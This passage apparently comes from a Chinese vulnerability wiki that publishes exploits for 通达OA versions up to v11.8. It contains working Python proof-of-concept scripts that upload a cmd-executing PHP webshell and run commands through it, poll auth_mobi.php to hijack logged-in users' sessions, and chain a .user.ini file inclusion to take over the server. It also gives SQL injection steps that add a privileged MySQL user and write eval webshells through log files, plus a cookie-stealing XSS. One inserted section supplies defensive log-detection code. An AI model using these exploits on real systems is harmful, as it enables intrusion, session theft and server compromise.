    (the webshell that bypasses the upload restriction)
    <?php
    $command=$_GET['test'];
    $wsh = new COM('WScript.shell');
    $exec = $wsh->exec("cmd /c ".$command);
    $stdout = $exec->StdOut();
    $stroutput = $stdout->ReadAll();
    echo $stroutput;
    ?>
    """
    vuln_url = target_url + "/general/data_center/utils/upload.php?action=upload&filetype=test&repkid=/.<>./.<>./.<>./"
    files = {'FILE1': ('test.php', payload_php)}
    try:
        vuln_response = requests.post(url = vuln_url, files=files)
        if vuln_response.status_code == 200:
            print("\033[32m[o] 成功写入webshell文件: _test.php \033[0m")
            print("\033[32m[o] webshell地址为: {}/_test.php \033[0m".format(target_url))
        else:
            print("\033[31m[x] 写入webshell文件失败 \033[0m")
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败,{} \033[0m".format(e))
        sys.exit(0)


def POC_4(target_url, cmd):
    cmd_url = target_url + "/_test.php?test={}".format(cmd)
    try:
        cmd_response = requests.get(url = cmd_url)
        if cmd_response.status_code == 200:
            print("\033[32m[o] 正在执行命令: {} \033[0m".format(cmd_url))
            print("\033[32m[o] 响应为: \n{} \033[0m".format(cmd_response.text))
        else:
            print("\033[31m[x] 命令执行失败 \033[0m")
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败,{} \033[0m".format(e))
        sys.exit(0)


if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    POC_1(target_url)
    POC_2(target_url)
    payload_php = base64.b64decode("PD9waHAKICAgICRjb21tYW5kPSRfR0VUWyd0ZXN0J107CiAgICAkd3NoID0gbmV3IENPTSgnV1NjcmlwdC5zaGVsbCcpOwogICAgJGV4ZWMgPSAkd3NoLT5leGVjKCJjbWQgL2MgIi4kY29tbWFuZCk7CiAgICAkc3Rkb3V0ID0gJGV4ZWMtPlN0ZE91dCgpOwogICAgJHN0cm91dHB1dCA9ICRzdGRvdXQtPlJlYWRBbGwoKTsKICAgIGVjaG8gJHN0cm91dHB1dDsKPz4=").decode("utf-8")
    POC_3(target_url, payload_php)
    while True:
        cmd = input("\033[35mCmd >>> \033[0m")
        if cmd == "exit":
            sys.exit(0)
        else:
            POC_4(target_url, cmd)
```
![image-20220209110115108](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091101200.png)


@ -0,0 +1,268 @@
# 通达OA v11.7 auth_mobi.php online user login vulnerability
## Vulnerability description
通达OA v11.7 exposes an endpoint that queries whether a user is online; when the user is online it returns their PHPSESSID, which can be used to log in to the back-end system.
## Affected products
```
通达OA < v11.7
```
## Environment setup
[通达OA v11.7 download link](https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe)
Download it and follow the installer steps.
## Reproduction
The relevant file is **MYOA\webroot\mobile\auth_mobi.php**:
```php
<?php
function relogin()
{
    echo _('RELOGIN');
    exit;
}
ob_start();
include_once 'inc/session.php';
include_once 'inc/conn.php';
include_once 'inc/utility.php';
if ($isAvatar == '1' && $uid != '' && $P_VER != '') {
    $sql = 'SELECT SID FROM user_online WHERE UID = \'' . $uid . '\' and CLIENT = \'' . $P_VER . '\'';
    $cursor = exequery(TD::conn(), $sql);
    if ($row = mysql_fetch_array($cursor)) {
        $P = $row['SID'];
    }
}
if ($P == '') {
    $P = $_COOKIE['PHPSESSID'];
    if ($P == '') {
        relogin();
        exit;
    }
}
if (preg_match('/[^a-z0-9;]+/i', $P)) {
    echo _('非法参数');
    exit;
}
if (strpos($P, ';') !== false) {
    $MY_ARRAY = explode(';', $P);
    $P = trim($MY_ARRAY[1]);
}
session_id($P);
session_start();
session_write_close();
if ($_SESSION['LOGIN_USER_ID'] == '' || $_SESSION['LOGIN_UID'] == '') {
    relogin();
}
```
In the SQL statement being executed:
```php
$sql = 'SELECT SID FROM user_online WHERE UID = \'' . $uid . '\' and CLIENT = \'' . $P_VER . '\'';
```
![image-20220209110301234](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091103308.png)
Reading the PHP source shows that this SQL statement checks whether the user is online and, if so, returns that user's session ID.
![image-20220209110315136](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091103236.png)
Use the cookie value from the returned Set-Cookie header as the login cookie
and visit the back end at http://xxx.xxx.xxx.xxx/general/
![image-20220209110344202](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091103301.png)
When the target user is offline, the vulnerable page responds as shown below.
Iterating over uid values can also yield other users' sessions, though possibly with lower privileges.
![image-20220209110407741](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091104808.png)
Following this idea, the page can be polled continuously to capture the cookie of a user as soon as they come online.
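Both session-forging flows on this page leave a recognisable trace in the web server's access log: the v11.5 login_code.php flow above is a code fetch immediately followed by the confirmation POST from the same address (the public POC also rotates its User-Agent per request), and the auth_mobi.php flow described here is the same `isAvatar=1` request repeated every few seconds from one address, possibly over several uid values. The following is an added example (not code from 通达OA or from this wiki) of detection logic for both patterns, run over constructed combined-format log lines; the IP addresses, timestamps and client strings are made up for the example, and the assumption that a genuine QR login is never confirmed from the browser's own address within seconds is stated in the code.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache/nginx combined format). 203.0.113.7
# drives the v11.5 QR-login flow the way the public POC does; 203.0.113.9 polls
# auth_mobi.php every five seconds; the other two addresses are ordinary traffic.
# Client strings are placeholders, not real browsers or apps.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Feb/2022:10:57:01 +0800] "GET /general/login_code.php HTTP/1.1" 200 182 "-" "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5"
203.0.113.7 - - [09/Feb/2022:10:57:01 +0800] "POST /logincheck_code.php HTTP/1.1" 302 0 "-" "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52"
203.0.113.7 - - [09/Feb/2022:10:57:02 +0800] "GET /general/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1"
198.51.100.20 - - [09/Feb/2022:10:58:10 +0800] "GET /general/login_code.php HTTP/1.1" 200 182 "http://oa.example/" "ExampleBrowser/1.0"
198.51.100.20 - - [09/Feb/2022:10:59:45 +0800] "GET /general/index.php HTTP/1.1" 200 5120 "http://oa.example/" "ExampleBrowser/1.0"
203.0.113.9 - - [09/Feb/2022:11:04:00 +0800] "GET /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 HTTP/1.1" 200 7 "-" "ExampleBrowser/1.0"
203.0.113.9 - - [09/Feb/2022:11:04:05 +0800] "GET /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 HTTP/1.1" 200 7 "-" "ExampleBrowser/1.0"
203.0.113.9 - - [09/Feb/2022:11:04:10 +0800] "GET /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 HTTP/1.1" 200 7 "-" "ExampleBrowser/1.0"
203.0.113.9 - - [09/Feb/2022:11:04:15 +0800] "GET /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 HTTP/1.1" 200 7 "-" "ExampleBrowser/1.0"
203.0.113.9 - - [09/Feb/2022:11:04:20 +0800] "GET /mobile/auth_mobi.php?isAvatar=1&uid=2&P_VER=0 HTTP/1.1" 200 7 "-" "ExampleBrowser/1.0"
203.0.113.9 - - [09/Feb/2022:11:04:25 +0800] "GET /mobile/auth_mobi.php?isAvatar=1&uid=2&P_VER=0 HTTP/1.1" 200 0 "-" "ExampleBrowser/1.0"
192.0.2.44 - - [09/Feb/2022:11:04:12 +0800] "GET /mobile/auth_mobi.php?isAvatar=1&uid=37&P_VER=20 HTTP/1.1" 200 0 "-" "ExampleMobileClient/1.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def group_by_ip(log_text):
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)
    for recs in by_ip.values():
        recs.sort(key=lambda r: r["ts"])
    return by_ip


def detect_forged_qr_login(log_text, window=timedelta(seconds=5)):
    """v11.5 pattern: GET login_code.php and POST logincheck_code.php from the same
    address within `window`, and that address presenting more than one User-Agent.
    Assumption: a real login needs a phone to scan the code, so the confirmation
    does not arrive from the browser's own address within seconds."""
    flagged = []
    for ip, recs in group_by_ip(log_text).items():
        gets = [r["ts"] for r in recs if r["method"] == "GET" and r["path"] == "/general/login_code.php"]
        posts = [r["ts"] for r in recs if r["method"] == "POST" and r["path"] == "/logincheck_code.php"]
        paired = any(timedelta(0) <= p - g <= window for g in gets for p in posts)
        if paired and len({r["ua"] for r in recs}) > 1:
            flagged.append(ip)
    return flagged


def detect_session_polling(log_text, window=timedelta(seconds=60), threshold=5):
    """v11.7 pattern: `threshold` or more isAvatar=1 requests to auth_mobi.php from
    one address inside any `window`; reports which uid values were probed."""
    alerts = {}
    for ip, recs in group_by_ip(log_text).items():
        hits = [r for r in recs
                if r["path"] == "/mobile/auth_mobi.php" and r["query"].get("isAvatar") == ["1"]]
        times = [r["ts"] for r in hits]
        best, j = 0, 0
        for i in range(len(times)):          # sliding window over sorted timestamps
            while times[i] - times[j] > window:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            alerts[ip] = {"requests_in_window": best,
                          "uids_probed": sorted({r["query"].get("uid", ["?"])[0] for r in hits})}
    return alerts
```

On the sample, `detect_forged_qr_login` flags only 203.0.113.7 and `detect_session_polling` flags only 203.0.113.9 with six requests in the window across uids 1 and 2; the single legitimate-looking mobile request from 192.0.2.44 stays below the threshold.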
## Vulnerability POC
Tests every 5 seconds whether the user is online:
```python
import requests
import sys
import random
import re
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def title():
    print('+------------------------------------------')
    print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
    print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
    print('+ \033[34m公众号 : PeiQi文库 \033[0m')
    print('+ \033[34mVersion: 通达OA 11.7 \033[0m')
    print('+ \033[36m使用格式: python3 poc.py \033[0m')
    print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
    print('+------------------------------------------')


def POC_1(target_url):
    vuln_url = target_url + "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        if "RELOGIN" in response.text and response.status_code == 200:
            print("\033[31m[x] 目标用户为下线状态 --- {}\033[0m".format(time.asctime( time.localtime(time.time()))))
        elif response.status_code == 200 and response.text == "":
            PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(response.headers))
            print("\033[32m[o] 用户上线 PHPSESSION: {} --- {}\033[0m".format(PHPSESSION[0] ,time.asctime(time.localtime(time.time()))))
        else:
            print("\033[31m[x] 请求失败,目标可能不存在漏洞")
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)


if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    while True:
        POC_1(target_url)
        time.sleep(5)
```
![image-20220209110424915](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091104066.png)
Added on 2021-03-11: a follow-up exploitation POC
Combined with the < v11.8 command execution: once a user is seen to come online, the server is taken over.
```python
import requests
import sys
import random
import re
import base64
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def title():
    print('+------------------------------------------')
    print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
    print('+ \033[34mVersion: 通达OA 11.7 \033[0m')
    print('+ \033[36m使用格式: python3 poc.py \033[0m')
    print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
    print('+------------------------------------------')


def POC_0(target_url):
    vuln_url = target_url + "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        if "RELOGIN" in response.text and response.status_code == 200:
            print("\033[31m[x] 目标用户为下线状态 --- {}\033[0m".format(time.asctime( time.localtime(time.time()))))
        elif response.status_code == 200 and response.text == "":
            Cookie = re.findall(r'PHPSESSID=(.*?);', str(response.headers))
            print("\033[32m[o] 用户上线 PHPSESSION: {} --- {}\033[0m".format(Cookie[0] ,time.asctime(time.localtime(time.time()))))
            Cookie = "PHPSESSID={};USER_NAME_COOKIE=admin; OA_USER_ID=admin".format(Cookie[0])
            POC_1(target_url, Cookie)
        else:
            print("\033[31m[x] 请求失败,目标可能不存在漏洞")
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)


def POC_1(target_url, Cookie):
    vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/.user"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
        "Connection": "close",
        "Cookie": Cookie,
        "Upgrade-Insecure-Requests": "1",
    }
    data = base64.b64decode("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9IkFUVEFDSE1FTlQiOyBmaWxlbmFtZT0idGVzdC5pbmkiCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbgoKYXV0b19wcmVwZW5kX2ZpbGU9dGVzdC5sb2cKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNzUxODMyMzk4NjU0ODk5Mjk1MTk4NDA1NzEwNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InN1Ym1pdCIKCuaPkOS6pAotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE3NTE4MzIzOTg2NTQ4OTkyOTUxOTg0MDU3MTA0LS0=")
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
        print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/.user \033[0m".format(target_url))
        if "档案已保存" in response.text and response.status_code == 200:
            print("\033[32m[o] 目标 {} 成功上传.user.ini文件, \033[0m".format(target_url))
            POC_2(target_url, Cookie)
        else:
            print("\033[31m[x] 目标 {} 上传.user.ini文件失败\033[0m".format(target_url))
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)


def POC_2(target_url, Cookie):
    vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/test"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "multipart/form-data; boundary=---------------------------17518323986548992951984057104",
        "Connection": "close",
        "Cookie": Cookie,
        "Upgrade-Insecure-Requests": "1",
    }
    data = base64.b64decode("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")
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
        print("\033[36m[o] 正在请求 {}/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/test \033[0m".format(target_url))
        if "档案已保存" in response.text and response.status_code == 200:
            print("\033[32m[o] 目标 {} 成功上传 test.log 文件, \033[0m".format(target_url))
            POC_3(target_url, Cookie)
        else:
            print("\033[31m[x] 目标 {} 上传 test.log 文件失败\033[0m".format(target_url))
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)


def POC_3(target_url, Cookie):
    vuln_url = target_url + "/general/reportshop/workshop/report/attachment-remark/form.inc.php?"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Cookie": Cookie,
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        print("\033[36m[o] 正在请求 {}/general/reportshop/workshop/report/attachment-remark/form.inc.php? \033[0m".format(target_url))
        if "test_Wiki" in response.text and response.status_code == 200:
            print("\033[32m[o] 目标 {} 存在漏洞,响应中包含 test_Wiki \033[0m".format(target_url))
            print("\033[32m[o] 成功上传蚁剑木马 密码为: test \n[o] webshell路径: {}/general/reportshop/workshop/report/attachment-remark/form.inc.php?\033[0m".format(target_url))
            sys.exit(0)
        else:
            print("\033[31m[x] 目标 {} 不存在漏洞,响应中不包含 test_Wiki\033[0m".format(target_url))
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)


if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    while True:
        POC_0(target_url)
        time.sleep(5)
```
![image-20220209110452574](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091104695.png)


@ -0,0 +1,105 @@
# 通达OA v11.7 delete_cascade.php authenticated SQL injection
## Vulnerability description
The 通达OA v11.7 back end has a SQL injection that can be used to write a malicious backdoor file and attack the target server.
## Affected products
```
通达OA v11.7
```
## Environment setup
[Environment download](https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe)
## Reproduction
In the **general/hr/manage/query/delete_cascade.php** file:
![image-20220209110843192](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091108270.png)
It first checks whether `$condition_cascade` is empty; if not, every `\'` in it is replaced with `'`. Why this replacement? Mainly because in V11.7 the variable registration step protects user input with `addslashes`, as shown below:
**inc/common.inc.php** code
![image-20220209110858090](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091108141.png)
Testing the SQL injection with a blind payload:
![image-20220209110914705](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091109818.png)
This triggers 通达OA's SQL injection filter.
The filtering mechanism is found in **inc/conn.php**:
![image-20220209110944424](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091109512.png)
It filters some characters, but not so strictly that it cannot be bypassed. The key point for blind injection is that functions such as `substr` and `if` are not filtered, so as long as a MySQL error can be triggered it can be combined with `if` for error-based blind injection. Looking through 局外人's talk at the Butian white-hat conference, `power(9999,99)` also makes the database throw an error, so the statement is:
```sql
select if((substr(user(),1,1)='r'),1,power(9999,99)) # no error when the character matches, an error otherwise
```
![image-20220209111011701](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091110796.png)
![image-20220209111026602](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091110677.png)
Add a database user:
```sql
grant all privileges ON mysql.* TO 'peiqi'@'%' IDENTIFIED BY 'peiqiABC@123' WITH GRANT OPTION
```
Visit:
```plain
http://xxx.xxx.xxx.xxx/general/hr/manage/query/delete_cascade.php?condition_cascade=grant all privileges ON mysql.* TO 'peiqi'@'%' IDENTIFIED BY 'peiqiABC@123' WITH GRANT OPTION
```
Go to the **Myoa/mysql5/bin** directory, run **mysql -upeiqi -p**, enter the password and list all users:
![image-20220209111049110](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091110154.png)
The account was added successfully.
This user has all privileges on the mysql database, so it can grant itself further privileges:
```sql
UPDATE `mysql`.`user` SET `Password` = '*FBCFBB73CF21D4F464A95E775B40AF27A679CD2D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('peiqi' AS Binary(5));
```
![image-20220209111109474](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091111720.png)
Then use the injection point to flush privileges, because this user does not itself have the reload privilege: `general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;`. It now has all privileges.
![image-20220209111122226](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091111343.png)
If the login fails, run:
```sql
grant all privileges ON mysql.* TO 'peiqi'@'%' IDENTIFIED BY 'peiqiABC@123' WITH GRANT OPTION
```
Write a shell via the vulnerability:
```sql
# find the path:
select @@basedir; # e.g. F:\OA\mysql5\, so the web directory is F:/OA/webroot/
# method 1
set global slow_query_log=on;
set global slow_query_log_file='F:/OA/webroot/';
select '<?php eval($_POST[x]);?>' or sleep(11);
# method 2
set global general_log = on;
set global general_log_file = 'F:/OA/webroot/';
select '<?php eval($_POST[x]);?>';
show variables like '%general%';
```
Upload a full webshell
![image-20220209111135417](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091111491.png)
## References
[通达OA v11.7 back-end SQL injection to RCE [0day]](https://mp.weixin.qq.com/s/8rvIT1y_odN2obJ1yAvLbw)


@ -0,0 +1,267 @@
# 通达OA v11.8 update.php authenticated file inclusion XSS vulnerability
## Vulnerability description
Versions of 通达OA below v11.8 have a file upload endpoint through which a .user.ini file can be uploaded that includes a file containing an XSS payload, so that every back-end page an administrator opens includes the XSS and the attacker can obtain sensitive information.
## Affected products
```
通达OA < v11.8
```
## Environment setup
[通达OA v11.6 download link](https://cdndown.tongda2000.com/oa/2019/TDOA11.6.exe)
After downloading, click to install.
## Reproduction
The environment used here is 通达 v11.6, where the vulnerability is easier to exploit; from v11.7 on the upload path is fixed, which makes the XSS harder to exploit.
The vulnerable file is **webroot/general/hr/manage/staff_info/update.php**:
```php
<?php
include_once "inc/auth.inc.php";
include_once "inc/utility_all.php";
include_once "inc/utility_file.php";
include_once "inc/utility_field.php";
include_once "inc/utility_cache.php";
include_once "general/system/log/annual_leave_log.php";
if (strstr($BYNAME, "/") || strstr($BYNAME, "\\") || strstr($BYNAME, "..")) {
Message(_("错误"), _("OA用户名包含非法字符"));
exit();
}
include_once "inc/header.inc.php";
echo "\r\n<body class=\"bodycolor\">\r\n";
echo "\r\n<body class=\"bodycolor\">\r\n";
$PHOTO_NAME0 = $_FILES["ATTACHMENT"]["name"];
$ATTACHMENT = $_FILES["ATTACHMENT"]["tmp_name"];
if ($PHOTO_NAME0 != "") {
$FULL_PATH = MYOA_ATTACH_PATH . "hrms_pic";
if (!file_exists($FULL_PATH)) {
@mkdir($FULL_PATH, 448);
}
$PHOTO_NAME = $USER_ID . substr($PHOTO_NAME0, strrpos($PHOTO_NAME0, "."));
$FILENAME = MYOA_ATTACH_PATH . "hrms_pic/" . $PHOTO_NAME;
td_copy($ATTACHMENT, $FILENAME);
if (file_exists($ATTACHMENT)) {
unlink($ATTACHMENT);
}
if (!file_exists($FILENAME)) {
Message(_("附件上传失败"), _("原因附件文件为空或文件名太长或附件大于30兆字节或文件路径不存在"));
Button_Back();
exit();
}
}
```
![image-20220209111308741](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091113931.png)
在这里参数 **$USER_ID** 是可控的,并且无过滤危险符号就拼接进去了,那我们传入 **../../../** 我们就可以任意文件上传了
由于通达OA 的文件上传限制的死死的,所以我们可以通过利用 PHP的 **.user.ini** 文件来包含其他文件这里是可以用于包含XSS语句的文件的所以我们上传文件
内容为
```plain
auto_prepend_file=test.log
```
我们想要最大化利用可以上传在**首页或者管理员** 界面,利用自定义弹窗来渗透
这里对管理员页面 **general** 目录上传
请求包为
```plain
POST /general/hr/manage/staff_info/update.php?USER_ID=../../general/.user HTTP/1.1
Host: 192.168.1.105
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17518323986548992951984057104
Content-Length: 365
Connection: close
Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=kqfgar7u3c0ang0es41u3u67p4; SID_1=a63eb31
Upgrade-Insecure-Requests: 1
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="ATTACHMENT"; filename="peiqi.ini"
Content-Type: text/plain
auto_prepend_file=peiqi.log
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="submit"
提交
-----------------------------17518323986548992951984057104--
```
其中 **USER_ID=../../general/.user** 为上传路径
```plain
Content-Disposition: form-data; name="ATTACHMENT"; filename="peiqi.ini"
Content-Type: text/plain
auto_prepend_file=peiqi.log
```
这里拼接后上传就变成了 **.user.ini**
![image-20220209111339894](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091113999.png)
这里再上传 XSS文件 **peiqi.log** 被包含进去
![image-20220209111358294](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091113385.png)
上传后每次管理员登录后都会带着Cookie请求一次XSS平台
![image-20220209111423483](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091114571.png)
钓鱼什么的代码写在peiqi.log文件里就好啦
刚刚提到了 v11.7版本不方便利用,这是因为在后续版本加上了文件上传的规定路径
![image-20220209111524536](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091115646.png)
```php
if ((strpos($source, "webroot") !== false) && (strpos($source, "attachment") === false)) {
return false;
}
else {
return true;
}
```
路径中必须要包含 **webroot 和 attachment** 才可以上传
![image-20220209111502133](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091115242.png)
这里XSS的利用点有4个文件夹其中最有几率XSS的为**存储目录管理的文件夹**
![image-20220209111547012](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091115069.png)
用同样的方法上传利用文件每次当管理员设置时就会盗取Cookie
## 漏洞POC
因为是xss可能对目标有影响所以这里POC在一个不常用目录探测是否存在漏洞
Cookie填写访问后台时的Cookie, 其中的base64解码更改 PeiQi_Wiki为 自己的XSS语句
v11.6及以下 攻击 /general 和 /general/system/attachment 目录较好
v11.6以上 攻击 /general/system/attachment 目录较好
```python
import requests
import sys
import random
import re
import base64
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mVersion: 通达OA < V11.8 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+ \033[36mCookie >>> xxxxxxxxxxxxxxxxxxxxxx \033[0m')
print('+------------------------------------------')
def POC_1(target_url, Cookie):
vuln_url = target_url + "/general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop\workshop/report/attachment-remark/.user"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
